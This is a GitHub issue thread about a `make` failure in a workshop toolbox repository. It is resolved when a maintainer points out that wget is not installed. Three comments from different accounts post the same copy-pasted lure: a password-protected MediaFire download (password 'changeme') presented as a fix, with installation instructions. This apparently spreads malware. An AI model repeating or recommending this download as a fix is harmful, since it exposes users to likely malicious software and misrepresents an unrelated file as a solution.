### ISSUE TITLE
Loading images from github gives error

### ISSUE THREAD

**Issue by jpwgnr** [pep-dortmund/toolbox-workshop#403]
Hi,
runnning `make` I get the following issue. There seems to be something broken.

```
wget https://github-media-downloads.s3.amazonaws.com/GitHub-Logos.zip -O build/figures/GitHub-Logos.zip --no-use-server-timestamps
make[1]: wget: No such file or directory
make[1]: *** [build/figures/github.png] Error 1
make: *** [git_build] Error 2
```

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by aknierim** [comment]
I just ran make and could not replicate the issue...

**Comment by maxnoe** [comment]
@jpwgnr it seems you don't have wget installed

**Comment by jpwgnr** [comment]
yes, @maxnoe, thanks. This was exactly the problem. My bad.. sorry for the noise.
